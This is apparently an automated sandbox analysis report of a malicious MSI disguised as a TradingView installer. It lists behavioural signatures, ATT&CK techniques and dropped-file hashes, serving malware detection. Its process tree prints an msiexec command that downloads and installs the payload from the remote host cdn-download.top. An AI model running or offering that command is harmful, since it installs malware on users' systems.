hxxp://cdn-download[.]top/TradingView_setup[.]msi

Analysis

max time kernel
505s
max time network
508s
platform
windows10-2004_x64
resource
win10v2004-20220812-en
resource tags

arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system
submitted
25-01-2023 11:37

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

http://cdn-download.top/TradingView_setup.msi

Score

8^/10

Malware Config

Signatures

Blocklisted process makes network request 1 IoCs

Processes:

msiexec.exe

flow pid process

5 3664 msiexec.exe
Loads dropped DLL 6 IoCs

Processes:

MsiExec.exe

pid process

1096 MsiExec.exe
1096 MsiExec.exe
1096 MsiExec.exe
1096 MsiExec.exe
1096 MsiExec.exe
1096 MsiExec.exe
Unknown use of msiexec with remote resource 1 IoCs

Processes:

msiexec.exe

pid process

3664 msiexec.exe

flow	pid	process
5	3664	msiexec.exe

pid	process
1096	MsiExec.exe
1096	MsiExec.exe
1096	MsiExec.exe
1096	MsiExec.exe
1096	MsiExec.exe
1096	MsiExec.exe

pid	process
3664	msiexec.exe

Enumerates connected drives 3 TTPs 48 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

msiexec.exemsiexec.exe

description	ioc	process
File opened (read-only)	\??\M:	msiexec.exe
File opened (read-only)	\??\Q:	msiexec.exe
File opened (read-only)	\??\I:	msiexec.exe
File opened (read-only)	\??\K:	msiexec.exe
File opened (read-only)	\??\Q:	msiexec.exe
File opened (read-only)	\??\X:	msiexec.exe
File opened (read-only)	\??\K:	msiexec.exe
File opened (read-only)	\??\N:	msiexec.exe
File opened (read-only)	\??\Z:	msiexec.exe
File opened (read-only)	\??\Z:	msiexec.exe
File opened (read-only)	\??\E:	msiexec.exe
File opened (read-only)	\??\F:	msiexec.exe
File opened (read-only)	\??\H:	msiexec.exe
File opened (read-only)	\??\O:	msiexec.exe
File opened (read-only)	\??\S:	msiexec.exe
File opened (read-only)	\??\Y:	msiexec.exe
File opened (read-only)	\??\J:	msiexec.exe
File opened (read-only)	\??\T:	msiexec.exe
File opened (read-only)	\??\B:	msiexec.exe
File opened (read-only)	\??\G:	msiexec.exe
File opened (read-only)	\??\V:	msiexec.exe
File opened (read-only)	\??\G:	msiexec.exe
File opened (read-only)	\??\H:	msiexec.exe
File opened (read-only)	\??\I:	msiexec.exe
File opened (read-only)	\??\W:	msiexec.exe
File opened (read-only)	\??\A:	msiexec.exe
File opened (read-only)	\??\E:	msiexec.exe
File opened (read-only)	\??\O:	msiexec.exe
File opened (read-only)	\??\P:	msiexec.exe
File opened (read-only)	\??\A:	msiexec.exe
File opened (read-only)	\??\N:	msiexec.exe
File opened (read-only)	\??\R:	msiexec.exe
File opened (read-only)	\??\B:	msiexec.exe
File opened (read-only)	\??\L:	msiexec.exe
File opened (read-only)	\??\M:	msiexec.exe
File opened (read-only)	\??\S:	msiexec.exe
File opened (read-only)	\??\U:	msiexec.exe
File opened (read-only)	\??\L:	msiexec.exe
File opened (read-only)	\??\P:	msiexec.exe
File opened (read-only)	\??\T:	msiexec.exe
File opened (read-only)	\??\U:	msiexec.exe
File opened (read-only)	\??\F:	msiexec.exe
File opened (read-only)	\??\R:	msiexec.exe
File opened (read-only)	\??\X:	msiexec.exe
File opened (read-only)	\??\J:	msiexec.exe
File opened (read-only)	\??\V:	msiexec.exe
File opened (read-only)	\??\W:	msiexec.exe
File opened (read-only)	\??\Y:	msiexec.exe

Drops file in Windows directory 1 IoCs

Processes:

msiexec.exe

description ioc process

File opened for modification C:\Windows\Installer\MSI86E8.tmp msiexec.exe

description	ioc	process
File opened for modification	C:\Windows\Installer\MSI86E8.tmp	msiexec.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

msiexec.exemsiexec.exe

description	pid	process
Token: SeShutdownPrivilege	3664	msiexec.exe
Token: SeIncreaseQuotaPrivilege	3664	msiexec.exe
Token: SeRestorePrivilege	3664	msiexec.exe
Token: SeTakeOwnershipPrivilege	3664	msiexec.exe
Token: SeSecurityPrivilege	3896	msiexec.exe
Token: SeCreateTokenPrivilege	3664	msiexec.exe
Token: SeAssignPrimaryTokenPrivilege	3664	msiexec.exe
Token: SeLockMemoryPrivilege	3664	msiexec.exe
Token: SeIncreaseQuotaPrivilege	3664	msiexec.exe
Token: SeMachineAccountPrivilege	3664	msiexec.exe
Token: SeTcbPrivilege	3664	msiexec.exe
Token: SeSecurityPrivilege	3664	msiexec.exe
Token: SeTakeOwnershipPrivilege	3664	msiexec.exe
Token: SeLoadDriverPrivilege	3664	msiexec.exe
Token: SeSystemProfilePrivilege	3664	msiexec.exe
Token: SeSystemtimePrivilege	3664	msiexec.exe
Token: SeProfSingleProcessPrivilege	3664	msiexec.exe
Token: SeIncBasePriorityPrivilege	3664	msiexec.exe
Token: SeCreatePagefilePrivilege	3664	msiexec.exe
Token: SeCreatePermanentPrivilege	3664	msiexec.exe
Token: SeBackupPrivilege	3664	msiexec.exe
Token: SeRestorePrivilege	3664	msiexec.exe
Token: SeShutdownPrivilege	3664	msiexec.exe
Token: SeDebugPrivilege	3664	msiexec.exe
Token: SeAuditPrivilege	3664	msiexec.exe
Token: SeSystemEnvironmentPrivilege	3664	msiexec.exe
Token: SeChangeNotifyPrivilege	3664	msiexec.exe
Token: SeRemoteShutdownPrivilege	3664	msiexec.exe
Token: SeUndockPrivilege	3664	msiexec.exe
Token: SeSyncAgentPrivilege	3664	msiexec.exe
Token: SeEnableDelegationPrivilege	3664	msiexec.exe
Token: SeManageVolumePrivilege	3664	msiexec.exe
Token: SeImpersonatePrivilege	3664	msiexec.exe
Token: SeCreateGlobalPrivilege	3664	msiexec.exe
Token: SeCreateTokenPrivilege	3664	msiexec.exe
Token: SeAssignPrimaryTokenPrivilege	3664	msiexec.exe
Token: SeLockMemoryPrivilege	3664	msiexec.exe
Token: SeIncreaseQuotaPrivilege	3664	msiexec.exe
Token: SeMachineAccountPrivilege	3664	msiexec.exe
Token: SeTcbPrivilege	3664	msiexec.exe
Token: SeSecurityPrivilege	3664	msiexec.exe
Token: SeTakeOwnershipPrivilege	3664	msiexec.exe
Token: SeLoadDriverPrivilege	3664	msiexec.exe
Token: SeSystemProfilePrivilege	3664	msiexec.exe
Token: SeSystemtimePrivilege	3664	msiexec.exe
Token: SeProfSingleProcessPrivilege	3664	msiexec.exe
Token: SeIncBasePriorityPrivilege	3664	msiexec.exe
Token: SeCreatePagefilePrivilege	3664	msiexec.exe
Token: SeCreatePermanentPrivilege	3664	msiexec.exe
Token: SeBackupPrivilege	3664	msiexec.exe
Token: SeRestorePrivilege	3664	msiexec.exe
Token: SeShutdownPrivilege	3664	msiexec.exe
Token: SeDebugPrivilege	3664	msiexec.exe
Token: SeAuditPrivilege	3664	msiexec.exe
Token: SeSystemEnvironmentPrivilege	3664	msiexec.exe
Token: SeChangeNotifyPrivilege	3664	msiexec.exe
Token: SeRemoteShutdownPrivilege	3664	msiexec.exe
Token: SeUndockPrivilege	3664	msiexec.exe
Token: SeSyncAgentPrivilege	3664	msiexec.exe
Token: SeEnableDelegationPrivilege	3664	msiexec.exe
Token: SeManageVolumePrivilege	3664	msiexec.exe
Token: SeImpersonatePrivilege	3664	msiexec.exe
Token: SeCreateGlobalPrivilege	3664	msiexec.exe
Token: SeCreateTokenPrivilege	3664	msiexec.exe

Suspicious use of FindShellTrayWindow 2 IoCs

Processes:

msiexec.exe

pid process

3664 msiexec.exe
3664 msiexec.exe

pid	process
3664	msiexec.exe
3664	msiexec.exe

Suspicious use of WriteProcessMemory 3 IoCs

Processes:

msiexec.exe

description	pid	process	target process
PID 3896 wrote to memory of 1096	3896	msiexec.exe	MsiExec.exe
PID 3896 wrote to memory of 1096	3896	msiexec.exe	MsiExec.exe
PID 3896 wrote to memory of 1096	3896	msiexec.exe	MsiExec.exe

C:\Windows\system32\msiexec.exe
msiexec.exe /I http://cdn-download.top/TradingView_setup.msi
1⤵
- Blocklisted process makes network request
- Unknown use of msiexec with remote resource
- Enumerates connected drives
- Drops file in Windows directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:3664

C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
1⤵
- Enumerates connected drives
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3896

C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding 76AB742682231C35C5F5C0CBF218F3AA C
2⤵
- Loads dropped DLL
PID:1096

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\MSI1D6C.tmp
Filesize
377KB

MD5
af61221c6f4e9ab3ac2440b25d751868

SHA1
094f68ff354ac4c8dbdfe4689cb821f8d25880b8

SHA256
1e587d8593152b2538da7bdcb13880c45d256e84baa7e94c00ec4de08ab018d8

SHA512
c695d101c761812c1805d8ee54b8fed73869d3680372368ec3de90dc25ab1c27aa08f771dc274854ba051e0afeb17827c01b17e2bed33cb87ff0bdc884f6b791

Download Submit
C:\Users\Admin\AppData\Local\Temp\MSI1D6C.tmp
Filesize
377KB

MD5
af61221c6f4e9ab3ac2440b25d751868

SHA1
094f68ff354ac4c8dbdfe4689cb821f8d25880b8

SHA256
1e587d8593152b2538da7bdcb13880c45d256e84baa7e94c00ec4de08ab018d8

SHA512
c695d101c761812c1805d8ee54b8fed73869d3680372368ec3de90dc25ab1c27aa08f771dc274854ba051e0afeb17827c01b17e2bed33cb87ff0bdc884f6b791

Download Submit
C:\Users\Admin\AppData\Local\Temp\MSI205B.tmp
Filesize
377KB

MD5
af61221c6f4e9ab3ac2440b25d751868

SHA1
094f68ff354ac4c8dbdfe4689cb821f8d25880b8

SHA256
1e587d8593152b2538da7bdcb13880c45d256e84baa7e94c00ec4de08ab018d8

SHA512
c695d101c761812c1805d8ee54b8fed73869d3680372368ec3de90dc25ab1c27aa08f771dc274854ba051e0afeb17827c01b17e2bed33cb87ff0bdc884f6b791

Download Submit
C:\Users\Admin\AppData\Local\Temp\MSI205B.tmp
Filesize
377KB

MD5
af61221c6f4e9ab3ac2440b25d751868

SHA1
094f68ff354ac4c8dbdfe4689cb821f8d25880b8

SHA256
1e587d8593152b2538da7bdcb13880c45d256e84baa7e94c00ec4de08ab018d8

SHA512
c695d101c761812c1805d8ee54b8fed73869d3680372368ec3de90dc25ab1c27aa08f771dc274854ba051e0afeb17827c01b17e2bed33cb87ff0bdc884f6b791

Download Submit
C:\Users\Admin\AppData\Local\Temp\MSI2108.tmp
Filesize
377KB

MD5
af61221c6f4e9ab3ac2440b25d751868

SHA1
094f68ff354ac4c8dbdfe4689cb821f8d25880b8

SHA256
1e587d8593152b2538da7bdcb13880c45d256e84baa7e94c00ec4de08ab018d8

SHA512
c695d101c761812c1805d8ee54b8fed73869d3680372368ec3de90dc25ab1c27aa08f771dc274854ba051e0afeb17827c01b17e2bed33cb87ff0bdc884f6b791

Download Submit
C:\Users\Admin\AppData\Local\Temp\MSI2108.tmp
Filesize
377KB

MD5
af61221c6f4e9ab3ac2440b25d751868

SHA1
094f68ff354ac4c8dbdfe4689cb821f8d25880b8

SHA256
1e587d8593152b2538da7bdcb13880c45d256e84baa7e94c00ec4de08ab018d8

SHA512
c695d101c761812c1805d8ee54b8fed73869d3680372368ec3de90dc25ab1c27aa08f771dc274854ba051e0afeb17827c01b17e2bed33cb87ff0bdc884f6b791

Download Submit
C:\Users\Admin\AppData\Local\Temp\MSI2167.tmp
Filesize
377KB

MD5
af61221c6f4e9ab3ac2440b25d751868

SHA1
094f68ff354ac4c8dbdfe4689cb821f8d25880b8

SHA256
1e587d8593152b2538da7bdcb13880c45d256e84baa7e94c00ec4de08ab018d8

SHA512
c695d101c761812c1805d8ee54b8fed73869d3680372368ec3de90dc25ab1c27aa08f771dc274854ba051e0afeb17827c01b17e2bed33cb87ff0bdc884f6b791

Download Submit
C:\Users\Admin\AppData\Local\Temp\MSI2167.tmp
Filesize
377KB

MD5
af61221c6f4e9ab3ac2440b25d751868

SHA1
094f68ff354ac4c8dbdfe4689cb821f8d25880b8

SHA256
1e587d8593152b2538da7bdcb13880c45d256e84baa7e94c00ec4de08ab018d8

SHA512
c695d101c761812c1805d8ee54b8fed73869d3680372368ec3de90dc25ab1c27aa08f771dc274854ba051e0afeb17827c01b17e2bed33cb87ff0bdc884f6b791

Download Submit
C:\Users\Admin\AppData\Local\Temp\MSI2187.tmp
Filesize
377KB

MD5
af61221c6f4e9ab3ac2440b25d751868

SHA1
094f68ff354ac4c8dbdfe4689cb821f8d25880b8

SHA256
1e587d8593152b2538da7bdcb13880c45d256e84baa7e94c00ec4de08ab018d8

SHA512
c695d101c761812c1805d8ee54b8fed73869d3680372368ec3de90dc25ab1c27aa08f771dc274854ba051e0afeb17827c01b17e2bed33cb87ff0bdc884f6b791

Download Submit
C:\Users\Admin\AppData\Local\Temp\MSI2187.tmp
Filesize
377KB

MD5
af61221c6f4e9ab3ac2440b25d751868

SHA1
094f68ff354ac4c8dbdfe4689cb821f8d25880b8

SHA256
1e587d8593152b2538da7bdcb13880c45d256e84baa7e94c00ec4de08ab018d8

SHA512
c695d101c761812c1805d8ee54b8fed73869d3680372368ec3de90dc25ab1c27aa08f771dc274854ba051e0afeb17827c01b17e2bed33cb87ff0bdc884f6b791

Download Submit
C:\Users\Admin\AppData\Local\Temp\MSI22A1.tmp
Filesize
837KB

MD5
e76f80f8c9a51813813c351e35bf0755

SHA1
ec69253f3fd681d2829d60f3a14a48c779fabbb4

SHA256
87388281ef2eb907b4ad843c8bc0e3ec13dae903edfe53b29f78557588eb5161

SHA512
134a7be4012dc52763e5ac28eed7ce8e423a913f17449a672ce9f1192e69e5e00c62bce1f0374f76443832345eded1668f28fb9fbe7d287fc51dfdc199911dc5

Download Submit
C:\Users\Admin\AppData\Local\Temp\MSI22A1.tmp
Filesize
837KB

MD5
e76f80f8c9a51813813c351e35bf0755

SHA1
ec69253f3fd681d2829d60f3a14a48c779fabbb4

SHA256
87388281ef2eb907b4ad843c8bc0e3ec13dae903edfe53b29f78557588eb5161

SHA512
134a7be4012dc52763e5ac28eed7ce8e423a913f17449a672ce9f1192e69e5e00c62bce1f0374f76443832345eded1668f28fb9fbe7d287fc51dfdc199911dc5

Download Submit
memory/1096-132-0x0000000000000000-mapping.dmp

Download